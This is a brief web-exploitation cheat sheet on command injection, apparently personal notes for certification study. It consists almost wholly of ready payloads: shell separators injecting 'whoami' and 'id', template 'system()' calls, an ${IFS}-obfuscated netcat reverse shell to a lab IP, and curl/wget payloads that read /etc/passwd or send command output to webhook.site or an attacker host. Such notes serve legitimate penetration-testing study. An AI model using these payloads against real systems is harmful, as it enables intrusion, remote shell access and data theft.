// notes/ Web Exploitation
🕸️

Command Injection

<pre<code; whoami;asd

#web applications#adot8
source · oscp.adot8.com · web-applications/command-injection

Command injection

<pre><code>; whoami;asd &#x26; whoami # &#x26;&#x26; whoami ; whoami ; \nwhoami\n \n/bin/whoami\n <strong>\nwhoami; </strong>`whoami` `/bin/whoami` ;system('id') ;system('/usr/bin/id') %0a id %0a %0a id &#x3C;%=system("ping+10.10.14.22");%> &#x3C;%25%3dsystem("ping%2b10.10.14.22")%3b%25> </code></pre>

Using {IFS} when spaces aren't allowed

code
01`cat${IFS}file.txt`
02`./nc${IFS}10.13.58.119${IFS}1337${IFS}-e${IFS}/bin/bash`

Exploitation of curl

code
01file:///etc/passwd
02fileAdot8
03ftp://10.10.14.7
04gopher://10.10.14.7
05https://webhook.site/<id>/`whoami`
06https://webhook.site/<id>?`whoami`
07https://adot8.com \n wget http://10.10.14.7/`whoami`